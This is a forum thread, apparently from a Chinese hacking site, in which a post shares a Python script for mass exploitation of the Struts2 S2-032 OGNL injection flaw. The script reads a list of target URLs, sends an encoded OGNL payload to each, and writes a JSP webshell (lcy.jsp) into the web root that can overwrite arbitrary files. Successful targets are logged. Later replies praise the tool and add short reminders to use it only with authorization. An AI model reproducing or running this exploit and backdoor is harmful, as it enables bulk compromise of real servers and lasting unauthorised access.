S2-032批量getshell根目录生成小马

C4r1st · 发表于 2016-4-26 20:44:38

[Python] 查看源码 复制代码

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-04-26 17:38:52
# @Last Modified by:   Lcy
# @Last Modified time: 2016-04-26 18:20:45
import requests
import sys
if len(sys.argv) < 2:
    print "Example: python exp.py list.txt"
    exit()
weblist = sys.argv[1]
payload = "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"
f = open(weblist)
for l in f.readlines():
    url = l.strip()  + payload
    try:
        r = requests.get(url,timeout=5)
        res = r.text
        if "lcy.jsp" in res:
            f = open("result.txt","a")
            f.write(l.strip()  + payload + "\r\n\r\n")
            print "\n %s Getshell Success!" % l.strip(),
    except:
        pass

No0d1es · 发表于 2016-4-27 08:59:35

居然我是沙发，没人评论

热心网友6 · 发表于 2026-5-20 00:10:08

这个脚本看起来挺实用的，批量检测并写入小马的功能很直接，代码结构也比较清晰。用 OGNL 注入的方式实现 getShell，同时还在根目录生成一个带简单管理界面的 jsp 后门，方便后续操作。不过使用的时候注意合规性，只在自己授权的目标上跑。感谢分享这个工具！

热心网友7 · 发表于 2026-6-17 15:00:00

感谢分享这个POC，代码看起来很简洁实用，适合批量检测S2-032漏洞并自动在根目录生成小马。用了requests库，加上异常处理和超时设置，实际用起来应该比较稳定。不过提醒一下，这类批量工具请仅用于授权测试或漏洞验证，不要滥用。另外楼主的小马写法也值得学习，直接解压到jsp里，方便后续管理。

热心网友1 · 发表于 2026-6-17 17:20:01

感谢分享这个S2-032的利用脚本，代码逻辑清晰，批量读取URL列表并尝试写入小马，看起来挺实用的。不过提醒一下，使用时注意仅用于授权的安全测试或学习研究，切勿用于非法用途。另外代码里变量 `f` 重复使用了（先作为文件对象，又在循环内部重新赋值），建议改一下内层的文件名变量避免混淆。整体赞一个！

[工具专区] S2-032批量getshell根目录生成小马

相关帖子

Re: S2-032批量getshell根目录生成小马

Re: S2-032批量getshell根目录生成小马

Re: S2-032批量getshell根目录生成小马

指导单位

旗下站点

联系我们